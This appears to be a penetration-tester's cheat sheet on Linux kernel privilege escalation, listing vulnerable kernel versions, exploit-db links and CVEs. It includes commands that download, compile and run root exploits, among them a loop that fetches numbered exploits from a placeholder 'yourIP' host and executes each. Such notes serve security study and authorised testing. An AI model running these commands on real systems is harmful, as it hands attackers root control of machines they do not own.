# Kernel Exploitation

* Kernels are the core of any operating system.
* Think of it as a layer between application software and the actual computer hardware.
* The kernel has complete control over the operating system. Exploiting a kernel vulnerability can result in execution as the root user.

## Finding kernel exploit

1. **Enumerate kernel version - `uname -a`**
2. **Find matching exploits ( Google, ExploitDB, Github)**
3. **Compile and run.**

note: Beware though, as Kernel exploits can often be unstable and may be one-shot or cause a system crash.

### Linux Local Exploit

```
linux-exploit-suggester
unix_privesc_check
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
```

### Other exploits

* Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation:
  * <https://www.exploit-db.com/exploits/18411/>
  * <https://www.securityfocus.com/bid/51625/info>
  * CVE-2012-0056
* Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method):
  * <https://www.exploit-db.com/exploits/40616/>
  * CVE-2016-5195
* Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
  * <https://www.exploit-db.com/exploits/3/>
  * <http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c>
  * CVE-2003-0127
* Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1)
  * <https://www.exploit-db.com/exploits/8478/>
  * exploit/linux/local/udev\_netlink

### Exploits worth running

* Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

  ```
  https://www.exploit-db.com/exploits/37292
  ```
* CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

```
https://www.exploit-db.com/exploits/15285/
```

* Linux Kernel <= 2.6.37 'Full-Nelson.c'

```
https://www.exploit-db.com/exploits/15704/
```

* CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

```
https://git.zx2c4.com/CVE-2012-0056/about/
```

* Linux CVE 2012-0056

```
wget -O exploit.c <http://www.exploit-db.com/download/18411>

gcc -o mempodipper exploit.c

./mempodipper
```

* CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

```
https://dirtycow.ninja/
```

* Compile dirty cow:

```
 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
```

* Cross compiling exploits

```
gcc -m32 -o output32 hello.c #(32 bit)

gcc -m64 -o output hello.c # (64 bit)
```

* Linux 2.6.32

```
https://www.exploit-db.com/exploits/15285/
```

* Elevation in 2.6.x:

```
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
```